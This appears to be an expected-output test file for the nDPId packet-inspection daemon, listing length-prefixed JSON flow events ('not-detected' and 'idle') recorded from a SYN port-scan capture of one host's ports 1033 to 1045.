-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 